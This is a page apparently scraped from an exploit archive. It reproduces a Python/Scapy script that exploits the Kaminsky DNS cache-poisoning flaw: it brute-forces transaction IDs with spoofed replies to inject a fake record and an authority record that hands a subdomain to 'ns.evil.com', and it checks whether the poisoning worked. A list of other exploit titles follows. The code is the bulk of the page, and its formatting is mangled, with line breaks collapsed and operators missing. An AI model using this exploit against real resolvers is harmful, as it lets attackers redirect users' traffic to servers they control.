from scapy import *import random# Copyright (C) 2008 Julien Desfossez <ju@klipix.org># uploa/ This program is free software; you can redistribute it and/or modify# it under the terms of the GNU General Public License as published by# the Free Software Foundation; either version 2 of the License, or# (at your option) any later version.## This program is distributed in the hope that it will be useful,# but WITHOUT ANY WARRANTY; without even the implied warranty of# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the# GNU General Public License for more details.## You should have received a copy of the GNU General Public License# along with this program; if not, write to the Free Software# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA# This script exploit the flaw discovered by Dan Kaminsky# uploa/cvename.cgi uploa/800113 It tries to insert a dummy record in the vulnerable DNS server by guessing# the transaction ID.# It also insert Authority record for a valid record of the target domain.# To use this script, you have to discover the source port used by the vulnerable# DNS server.# Python is really slow, so it will take some time, but it works :-)# IP to insert for our dummy recordtargetip = "X.X.X.X"# Vulnerable recursive DNS servertargetdns = "X.X.X.X"# Authoritative NS for the target domainsrcdns = ["X.X.X.X"]# Domain to play withdummydomain = ""basedomain = ".example.com."# sub-domain to claim authority ondomain = "sub.example.com."# Spoofed authoritative DNS for the sub-domainspoof="ns.evil.com."# src port of vulnerable DNS for recursive queriesdnsport = 32883# base packetrep = IP(dst=targetdns, src=srcdns[0])/ \\UDP(sport=53, dport=dnsport)/ \\DNS(id=99, qr=1, rd=1, ra=1, qdcount=1, ancount=1, nscount=1, arcount=0, qd=DNSQR(qname=dummydomain, qtype=1, qclass=1), an=DNSRR(rrname=dummydomain, ttl=70000, rdata=targetip, rdlen=4),ns=DNSRR(rrname=domain, rclass=1, ttl=70000, rdata=spoof, rdlen=len(spoof) 1, type=2))currentid = 1024dummyid = 3while 1:dummydomain = "a" str(dummyid) basedomaindummyid = dummyid 1# request for our dummydomainreq = IP(dst=targetdns)/ \\ UDP(sport=random.randint(1025, 65000), dport=53)/ \\ DNS(id=99, opcode=0, qr=0, rd=1, ra=0, qdcount=1, ancount=0, nscount=0, arcount=0, qd=DNSQR(qname=dummydomain, qtype=1, qclass=1), an=0, ns=0, ar=0)send(req)# build the responserep.getlayer(DNS).qd.qname = dummydomainrep.getlayer(DNS).an.rrname = dummydomainfor i in range(50):# TXIDrep.getlayer(DNS).id = currentidcurrentid = currentid 1if currentid == 65536:currentid = 1024# len and chksumrep.getlayer(UDP).len = IP(str(rep)).len-20rep[UDP].post_build(str(rep[UDP]), str(rep[UDP].payload))print "Sending our reply from %s with TXID = %s for %s" % (srcdns[0], str(rep.getlayer(DNS).id), dummydomain)send(rep, verbose=0)# check to see if it workedreq = IP(dst=targetdns)/ \\ UDP(sport=random.randint(1025, 65000), dport=53)/ \\ DNS(id=99, opcode=0, qr=0, rd=1, ra=0, qdcount=1, ancount=0, nscount=0, arcount=0, qd=DNSQR(qname=dummydomain, qtype=1, qclass=1), an=0, ns=0, ar=0)z = sr1(req, timeout=2, retry=0, verbose=0)try:if z[DNS].an.rdata == targetip:print "Successfully poisonned our target with a dummy record !!"breakexcept:print "Poisonning failed"
常见问题
相关文章
猜你喜欢
- Download Accelerator Plus – DAP 8.6 (AniGIF.ocx) Buffer Overflow PoC 2023-06-01
- BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit 2023-06-01
- Sun xVM VirtualBox 2023-06-01
- Discuz! 6.0.1 (searchid) Remote SQL Injection Exploit 2023-06-01
- LoveCMS 1.6.2 Final Update Settings Remote Exploit 2023-06-01
- TGS CMS 0.3.2r2 Remote Code Execution Exploit 2023-06-01
- BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (spoof on ircd) 2023-06-01
- LoveCMS 1.6.2 Final Remote Code Execution Exploit 2023-06-01
- Xerox Phaser 8400 (reboot) Remote Denial of Service Exploit 2023-06-01
- moziloCMS 1.10.1 (download.php) Arbitrary Download File Exploit 2023-06-01
